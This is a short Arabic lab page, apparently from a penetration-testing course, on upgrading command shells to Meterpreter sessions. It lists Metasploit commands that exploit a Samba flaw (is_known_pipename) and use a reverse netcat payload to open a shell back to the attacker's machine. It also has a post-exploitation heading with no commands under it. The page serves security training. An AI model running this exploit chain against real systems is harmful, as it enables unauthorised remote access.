🧪 المختبر العملي 16: ترقية أصداف الأوامر إلى أصداف Meterpreter (Upgrading Command Shells To Mete
📊 مرحلة الاستغلال (Exploitation)
msfconsole -quse exploit/unix/samba/is_known_pipename set RHOSTS [Target_IP_Address] set LHOST [Your_Kali_IP_Address] set LPORT 4444 set PAYLOAD cmd/unix/reverse_netcat exploit
backgroundsessions
📊 مرحلة ما بعد الاستغلال (Post-Exploitation): ترقية الجلسة
Previous🧪 المختبر العملي 15 : استغلال خادم SMTP ضعيف (Vulnerable SMTP Server Lab)Next🧪 المختبر العملي 17: وحدات ما بعد الاستغلال في Windows (Windows Post Exploitation Modules Lab)
Last updated

